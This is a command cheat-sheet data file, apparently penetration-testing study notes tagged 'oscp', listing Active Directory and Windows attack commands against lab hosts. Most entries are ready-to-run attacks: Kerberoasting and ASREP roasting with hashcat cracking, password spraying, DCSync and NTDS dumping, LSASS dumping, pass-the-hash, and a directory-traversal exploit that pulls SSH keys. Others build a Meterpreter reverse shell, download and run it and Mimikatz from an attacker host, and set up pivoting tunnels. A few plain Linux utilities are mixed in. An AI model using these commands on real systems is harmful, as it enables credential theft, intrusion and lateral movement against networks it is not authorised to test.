Linux + - cmd: bloodhound + lang: sh + tags: oscp + desc: Starting BloodHound in Kali Linux + - cmd: xfreerdp /cert-ignore /u:jeff /d:corp.com /p:HenchmanPutridBonbon11 /v:192.168.50.75 + lang: sh + tags: oscp + desc: Connecting to CLIENT75 via RDP + - cmd: dir \\web04.corp.com\backup + lang: ps1 + tags: oscp + desc: Displaying contents of a SMB share + - cmd: impacket-GetNPUsers -dc-ip 192.168.50.70 -request -outputfile hashes.asreproast corp.com/pete + lang: ps1 + tags: oscp + desc: Using GetNPUsers to perform ASREP roasting + - cmd: kerbrute userenum --dc 192.168.56.30 -d mini.lab /usr/share/seclists/Usernames/xato-net-10-million-usernames-dup.txt + lang: sh + tags: oscp + desc: enumerate users of AD using bruteforce userlist + - cmd: kerbrute passwordspray --dc 192.168.56.30 -d mini.lab users.txt phantom + lang: sh + tags: oscp + desc: perform a horizontal brute force attack against a list of domain users + - cmd: kerbrute bruteuser --dc 192.168.56.30 -d mini.lab /usr/share/seclists/Passwords/500-worst-passwords.txt ben + lang: sh + tags: oscp + desc: traditional bruteforce account against a username. Only run this if you are sure there is no lockout policy. + - cmd: cat combos.lst | kerbrute --dc 192.168.56.30 -d mini.lab bruteforce - + lang: sh + tags: oscp + desc: bruteforce with reads username and password combinations (in the format username:password) + - cmd: hashcat --help | grep -i "Kerberos" + lang: sh + tags: oscp + desc: Obtaining the correct mode for Hashcat + - cmd: sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force + lang: sh + tags: oscp + desc: Cracking the ASREP hash with Hashcat + - cmd: cd C:\Tools ; .\Rubeus.exe asreproast /nowrap + lang: ps1 + tags: oscp + desc: Using Rubeus to obtain the ASREP hash of _dave_ + - cmd: sudo hashcat -m 18200 hashes.asreproast2 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force + lang: sh + tags: oscp + desc: Cracking the modified ASREP hash + - cmd: .\Rubeus.exe kerberoast /outfile:hashes.kerberoast + lang: ps1 + tags: oscp + desc: Utilizing Rubeus to perform a Kerberoast attack + - cmd: cat hashes.kerberoast ; hashcat --help | grep -i "Kerberos" + lang: sh + tags: oscp + desc: Reviewing the correct Hashcat mode + - cmd: sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force + lang: sh + tags: oscp + desc: Cracking the TGSREP hash + - cmd: sudo impacket-GetUserSPNs -request -dc-ip 192.168.50.70 corp.com/pete + lang: sh + tags: oscp + desc: Using impacketGetUserSPNs to perform Kerberoasting on Linux + - cmd: sudo hashcat -m 13100 hashes.kerberoast2 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force + lang: sh + tags: oscp + desc: Cracking the TGSREP hash + - cmd: whoami /user + lang: ps1 + tags: oscp + desc: Obtaining the domain SID + - cmd: klist + lang: ps1 + tags: oscp + desc: Inspecting the injected ticket in memory or listing Kerberos tickets to confirm the silver ticket is submitted to the current session + - cmd: iwr -UseDefaultCredentials http://web04 + lang: ps1 + tags: oscp + desc: Accessing the SMB share with the silver ticket + - cmd: impacket-secretsdump -just-dc-user dave corp.com/jeffadmin:"BrouhahaTungPerorateBroom2023\!"@192.168.50.70 + lang: sh + tags: oscp + desc: Using secretsdump to perform the dcsync attack to obtain the NTLM hash of _dave_ + - cmd: impacket-secretsdump mini.lab/bob:"superman"@192.168.56.31 + lang: sh + tags: oscp + desc: Using secretsdump to get the secrets of the owned machine + - cmd: wmic /node:192.168.50.73 /user:jen /password:Nexus123! process call create "calc" + lang: ps1 + tags: oscp + desc: Running the wmic utility to spawn a process on a remote system. + - cmd: $username = 'jen'; ; Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command}; + lang: ps1 + tags: oscp + desc: Executing the WMI PowerShell payload. + - cmd: python3 encode.py + lang: sh + tags: oscp + desc: Running the base64 encoder Python script + - cmd: $username = 'jen'; ; $password = 'Nexus123!'; ; $secureString = ConvertTo-SecureString $password -AsPlaintext -Force; ; $credential = New-Object System.Management.Automation.PSCredential $username, $secureString; ; $Options = New-CimSessionOption -Protocol DCOM ; $Session = New-Cimsession -ComputerName 192.168.50.73 -Credential $credential -SessionOption $Options ; Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command}; + lang: ps1 + tags: oscp + desc: Executing the WMI payload with base64 reverse shell + - cmd: winrs -r:files04 -u:jen -p:Nexus123! "cmd /c hostname & whoami" + lang: ps1 + tags: oscp + desc: Executing commands remotely via WinRS + - cmd: $username = 'jen'; ; $password = 'Nexus123!'; ; $secureString = ConvertTo-SecureString $password -AsPlaintext -Force; ; $credential = New-Object System.Management.Automation.PSCredential $username, $secureString; ; New-PSSession -ComputerName 192.168.50.73 -Credential $credential + lang: ps1 + tags: oscp + desc: Establishing a PowerShell Remote Session via WinRM + - cmd: Enter-PSSession 1 + lang: ps1 + tags: oscp + desc: Inspecting the PowerShell Remoting session + - cmd: ./PsExec64.exe -i \\FILES04 -u corp\jen -p Nexus123! cmd + lang: ps1 + tags: oscp + desc: Obtaining an Interactive Shell on the Target System with PsExec + - cmd: /usr/bin/impacket-wmiexec -hashes :2892D26CDF84D7A70E2EB3B9F05C425E Administrator@192.168.50.73 + lang: sh + tags: oscp + desc: Passing the hash using Impacket wmiexec + - cmd: net use \\files04 ; klist + lang: ps1 + tags: oscp + desc: Mapping a network share on a remote server and listing Kerberos tickets + - cmd: cd C:\tools\SysinternalsSuite\ ; .\PsExec.exe \\files04 cmd + lang: ps1 + tags: oscp + desc: Opening remote connection using Kerberos + - cmd: whoami ; ls \\web04\backup + lang: ps1 + tags: oscp + desc: Verifying that the user jen has no access to the shared folder + desc: Injecting the selected TGS into process memory. + - cmd: ls \\web04\backup + lang: ps1 + tags: oscp + desc: Accessing the shared folder through the injected ticket + - cmd: tasklist | findstr "calc" + lang: ps1 + tags: oscp + desc: Veriyfing that calculator is running on FILES04 + - cmd: PsExec64.exe \\DC1 cmd.exe + lang: ps1 + tags: oscp + desc: Failed attempt to perform lateral movement + - cmd: PsExec.exe \\dc1 cmd.exe + lang: ps1 + tags: oscp + desc: Performing lateral movement and + - cmd: psexec.exe \\192.168.50.70 cmd.exe + lang: ps1 + tags: oscp + desc: Use of NTLM authentication blocks our + - cmd: vshadow.exe -nw -p C:\ + lang: ps1 + tags: oscp + desc: Permorming a Shadow Copy of the entire C:\ drive + - cmd: copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\ntds\ntds.dit c:\ntds.dit.bak + lang: ps1 + tags: oscp + desc: Copying the ntds database to the C:\ drive + - cmd: reg.exe save hklm\system c:\system.bak + lang: ps1 + tags: oscp + desc: Copying the ntds database to the C:\ drive + - cmd: impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL + lang: sh + tags: oscp + desc: Copying the ntds database to the C:\ drive + - cmd: mkdir beyond ; cd beyond ; mkdir mailsrv1 ; mkdir websrv1 ; touch creds.txt + lang: sh + tags: oscp + desc: Basic work environment for this penetration test + - cmd: gobuster dir -u http://192.168.50.242 -w /usr/share/wordlists/dirb/common.txt -o mailsrv1/gobuster -x txt,pdf,config + lang: sh + tags: oscp + desc: Using gobuster to identify pages and files on MAILSRV1 + - cmd: whatweb http://192.168.50.244 + lang: sh + tags: oscp + desc: WhatWeb scan of WEBSRV1 + - cmd: wpscan --url http://192.168.50.244 --enumerate p --plugins-detection aggressive -o websrv1/wpscan + lang: sh + tags: oscp + desc: WPScan of the WordPress web page on WEBSRV1 + - cmd: searchsploit duplicator + lang: sh + tags: oscp + desc: SearchSploit results for the Duplicator WordPress plugin + - cmd: searchsploit -x 50420 + lang: sh + tags: oscp + desc: Searchsploit command to examine a specific exploit + - cmd: cd beyond/websrv1 ; searchsploit -m 50420 + lang: sh + tags: oscp + desc: SearchSploit command to copy the exploit script to the current directory + - cmd: python3 50420.py http://192.168.50.244 /etc/passwd + lang: sh + tags: oscp + desc: Performing a Directory Traversal attack on WEBSRV1 + - cmd: python3 50420.py http://192.168.50.244 /home/marcus/.ssh/id_rsa ; python3 50420.py http://192.168.50.244 /home/daniela/.ssh/id_rsa + lang: sh + tags: oscp + desc: Retrieving the SSH private key of daniela + - cmd: ssh2john id_rsa > ssh.hash ; john --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash + lang: sh + tags: oscp + desc: Cracking the passphrase of the SSH private key + - cmd: ssh -i id_rsa daniela@192.168.50.244 + lang: sh + tags: oscp + desc: Accessing WEBSRV1 via SSH + - cmd: sudo git -p help config + lang: sh + tags: oscp + desc: Abusing git sudo command by launching pager in a privileged context + - cmd: cd /srv/www/wordpress/ ; git status ; git log + lang: sh + tags: oscp + desc: Examining the Git repository + - cmd: git show 612ff5783cc5dbd1e0e008523dba83374a84aaf1 + lang: sh + tags: oscp + desc: Displaying the differences between the two commits + - cmd: cat creds.txt + lang: sh + tags: oscp + desc: Displaying contents of creds.txt + - cmd: cat usernames.txt ; cat passwords.txt + lang: sh + tags: oscp + desc: Displaying the created lists containing the identified usernames and passwords + - cmd: crackmapexec smb 192.168.50.242 -u usernames.txt -p passwords.txt --continue-on-success + lang: sh + tags: oscp + desc: Checking for valid credentials with CrackMapExec + - cmd: crackmapexec smb 192.168.56.30 -u users.txt -p users.txt --no-bruteforce + lang: sh + tags: oscp + desc: Try the classic user=password test + - cmd: sprayhound -lu bob -lp superman -U users.txt -d mini.lab -dc 192.168.56.30 --lower -t 2 + lang: sh + tags: oscp + desc: try sprayhound with a valid user to avoid locking account (option -t to set the number of try left) + - cmd: crackmapexec smb 192.168.50.242 -u john -p "dqsTwTpZPn#nL" --shares + lang: sh + tags: oscp + desc: Listing SMB shares on MAILSRV1 with CrackMapExec + - cmd: crackmapexec smb 192.168.56.30 -u bob -p 'superman' -d mini.lab --users + lang: sh + tags: oscp + desc: see the status of bruteforce + - cmd: netexec smb 192.168.56.30 -u guest -p '' --rid-brute + lang: sh + tags: oscp + desc: netexec to enumerate user account names on the host with a RID cycle attack + - cmd: netexec smb 192.168.56.30 -u ben -p /usr/share/seclists/Passwords/500-worst-passwords.txt --continue-on-success + lang: sh + tags: oscp + desc: netexec to password spray SMB + - cmd: netexec rdp 192.168.56.30 -u ben -p /usr/share/seclists/Passwords/500-worst-passwords.txt + lang: sh + tags: oscp + desc: netexec to password spray RDP + - cmd: netexec winrm 192.168.56.31 -u bob -p /usr/share/seclists/Passwords/500-worst-passwords.txt + lang: sh + tags: oscp + desc: netexec to password spray WINRM + - cmd: lsassy -d mini.lab -u bob -p superman -m dumpertdll -O dumpertdll_path=~/hs/ressources/Outflank-Dumpert-DLL.dll 192.168.56.31 + lang: sh + tags: oscp + desc: Dumping LSASS + - cmd: impacket-GetADUsers -dc-ip 192.168.56.30 -all mini.lab/bob:superman + lang: sh + tags: oscp + desc: List all users on AD using an account + - cmd: ldapsearch -H ldap://192.168.56.30 -D "bob@mini.lab" -w superman -b 'DC=mini,DC=lab' "(&(objectCategory=person)(objectClass=user))" |grep 'distinguishedName:' + lang: sh + tags: oscp + desc: List all users on AD using an account and ldap + - cmd: mkdir /home/kali/beyond/webdav ; /home/kali/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali/beyond/webdav/ + lang: sh + tags: oscp + desc: Starting WsgiDAV on port 80 + - cmd: swaks --server 10.10.87.13 --auth-user f.miller@skylark.com --auth-pass w35oyfm9C95cXEm21GYY -q AUTH + lang: sh + tags: oscp + desc: Check a smtp account + - cmd: whoami ; hostname ; ipconfig + lang: sh + tags: oscp + desc: Obtaining basic information about the target machine + - cmd: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.119.5 LPORT=443 -f exe -o met.exe + lang: sh + tags: oscp + desc: Creating a Meterpreter reverse shell executable file + - cmd: sudo msfconsole -q ; use multi/handler ; set payload windows/x64/meterpreter/reverse_tcp ; set LHOST 192.168.119.5 ; set LPORT 443 ; set ExitOnSession false ; run -j + lang: sh + tags: oscp + desc: Starting Metasploit listener on port 443 + - cmd: iwr -uri http://192.168.119.5:8000/met.exe -Outfile met.exe ; .\met.exe + lang: sh + tags: oscp + desc: Downloading and executing Meterpreter reverse shell + - cmd: use multi/manage/autoroute ; set session 1 ; run ; use auxiliary/server/socks_proxy ; set SRVHOST 127.0.0.1 ; set VERSION 5 ; run -j + lang: sh + tags: oscp + desc: Creating a SOCKS5 proxy to access the internal network from our Kali machine + - cmd: cat /etc/proxychains4.conf + lang: sh + tags: oscp + desc: proxychains configuration file settings + - cmd: proxychains -q crackmapexec smb 172.16.6.240-241 172.16.6.254 -u john -d beyond.com -p "dqsTwTpZPn#nL" --shares + lang: sh + tags: oscp + desc: Enumerating SMB with CrackMapExec and proxychains + - cmd: ~/hs/tools/chisel server -p 8080 --reverse + lang: sh + tags: oscp + desc: Setting up Chisel on Kali to access the Web Server on INTERNALSRV1 via Browser + - cmd: sessions -i 1 ; upload chisel.exe C:\\Users\\marcus\\chisel.exe + lang: sh + tags: oscp + desc: Uploading Chisel to CLIENTWK1 via our Meterpreter session + - cmd: chisel.exe client 192.168.119.5:8080 R:80:172.16.6.241:80 + lang: sh + tags: oscp + desc: Utilizing Chisel to set up a reverse port forwarding to port 80 on INTERNALSRV1 + - cmd: proxychains -q impacket-GetUserSPNs -request -dc-ip 172.16.6.240 beyond.com/john + lang: sh + tags: oscp + desc: Kerberoasting the daniela user account + - cmd: sudo hashcat -m 13100 daniela.hash /usr/share/wordlists/rockyou.txt --force + lang: sh + tags: oscp + desc: Cracking the TGSREP hash + - cmd: cd C:\Users\Administrator ; iwr -uri http://192.168.119.5:8000/met.exe -Outfile met.exe ; .\met.exe + lang: sh + tags: oscp + desc: Downloading and executing the Meterpreter reverse shell + - cmd: iwr -uri http://192.168.119.5:8000/mimikatz.exe -Outfile mimikatz.exe ; .\mimikatz.exe + lang: ps1 + tags: oscp + desc: Downloading and launching the newest version of Mimikatz from our Kali machine + - cmd: proxychains -q impacket-psexec -hashes 00000000000000000000000000000000:f0397ec5af49971f6efbdb07877046b3 beccy@172.16.6.240 + lang: sh + tags: oscp + desc: Using psexec to get an interactive shell + - cmd: ~/hs/tools/reverse-sshx64 -l -v + lang: sh + tags: oscp + desc: Listen and bind reversessh + - cmd: issh -i ~/hs/ressources/rssh/id_reverse-ssh localhost -p1234 + lang: sh + tags: oscp + desc: connect back using reverse-ssh + - cmd: iscp -i ~/hs/ressources/rssh/id_reverse-ssh -P40633 localhost:/C:/Users/Administrator/20231208013035_BloodHound.zip ./ + lang: sh + tags: oscp + desc: using file transfert with reverse-ssh (windows target) + - cmd: frpc tcp -r 6001 -i 127.0.0.1 -l 7001 -n tunnel-name + lang: sh + tags: COMMON + desc: fast reverse tunnel 127.0.0.1:7001 to gb.hackade.org:6001 (need ghostunnel and chisel) + - cmd: tail --pid=$(pgrep procname) -f /dev/null && ntf send finished + lang: sh + tags: COMMON + desc: wait and send message when a process is fish + - cmd: python3 -mvenv ~/.virtualenvs/wsgidav + lang: sh + tags: COMMON + desc: create a new python virtualenvs + - cmd: source ~/.virtualenvs/wsgidav/bin/activate + lang: sh + tags: COMMON + desc: use a python venv + - cmd: python3 -mvenv ~/.virtualenvs/reindent ; source ~/.virtualenvs/wsgidav/bin/reindent; reindent + lang: sh + tags: COMMON + desc: install and use reindent for Python + - cmd: cat ips | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}" | sort | sponge ips + lang: sh + tags: COMMON + desc: extract ips from file + - cmd: paste -d ' ' old_ips ips | xargs -I{} bash -c "mv {}" + lang: sh + tags: COMMON + desc: batch rename directory + - cmd: ping -M do -s 192.168.1.1 + lang: sh + tags: COMMON + desc: check for the correct MTU value + - cmd: ip link set dev tun0 mtu 1250 + lang: sh + tags: COMMON + desc: change the mtu value for an interface + - cmd: sudo ip tuntap add user kali mode tun ligolo; sudo ip link set ligolo up + lang: sh + tags: oscp + desc: Setup Ligolo-ng proxy + - cmd: ~/hs/tools/ligolo-ng-proxy -selfcert + lang: sh + tags: oscp + desc: Launch Ligolo-ng proxy using self-signed certs + - cmd: ~/hs/tools/ligolo-ng-proxy -selfcert -laddr 0.0.0.0:7777 + lang: sh + tags: oscp + desc: Launch Ligolo-ng proxy using self-signed certs and custom port + - cmd: sudo ip route add 192.168.0.0/24 dev ligolo + lang: sh + tags: oscp + desc: Add a route on the proxy/relay server to the 192.168.0.0/24 agent network + - cmd: ligolo-ng-agent -ignore-cert -connect 192.168.45.157:11601 + lang: sh + tags: oscp + desc: connect ligolo-ng agent + - cmd: ligolo-ng » listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp + lang: sh + tags: oscp + desc: create a TCP listening socket on the agent (0.0.0.0:1234) and redirect connections to the 4321 port of the proxy server. + - cmd: ligolo-ng » session + lang: sh + tags: oscp + desc: select a target + - cmd: ligolo-ng » ifconfig + lang: sh + tags: oscp + desc: Display the network configuration of the agent + - cmd: ligolo-ng » start_tunnel + lang: sh + tags: oscp + desc: Start the tunnel on the proxy + - cmd: ligolo-ng » listener_list + lang: sh + tags: oscp + desc: view currently running listeners + - cmd: sudo ip route add 240.0.0.1/32 dev ligolo; nmap 240.0.0.1 -sV + lang: sh + tags: oscp + desc: Access to agent's local ports (127.0.0.1) + - cmd: ~/hs/tools/servedir.py ~/hs/ressources + lang: sh + tags: oscp + desc: launch local webserver to serve ressources files + - cmd: sudo ~/hs/tools/servedir.py ~/hs/ressources 80 + lang: sh + tags: oscp + desc: launch local webserver to serve ressources files on port 80 + - cmd: powershell Get-ChildItem -Path C:\users -Include *.txt -File -Recurse -ErrorAction SilentlyContinue + lang: ps1 + tags: oscp + desc: search all txt files in users home + - cmd: impacket-psexec 'Administrator:password@172.16.138.10' + lang: sh + tags: oscp + desc: psexec using a local login/password + - cmd: sudo lsof -nP -i tcp + lang: sh + tags: COMMON + desc: list process listing tcp socket + - cmd: sudo lsof -u 1000 + lang: sh + tags: COMMON + desc: list files used by UID 1000 + - cmd: sudo lsof -p 2658 + lang: sh + tags: COMMON + desc: list files used by PID 2658